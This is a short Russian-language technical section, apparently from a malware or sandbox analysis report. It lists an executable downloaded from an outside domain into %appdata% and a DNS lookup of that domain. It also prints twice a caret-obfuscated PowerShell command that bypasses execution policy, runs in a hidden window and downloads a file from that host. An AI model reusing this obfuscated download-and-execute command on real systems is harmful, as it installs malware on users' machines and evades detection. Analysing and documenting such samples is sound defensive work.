Техническая информация
- http://gorbatiegoidnei799.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://gorbatie...
- DNS ASK go#####egoidnei799.com
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://gorbatie...' (со скрытым окном)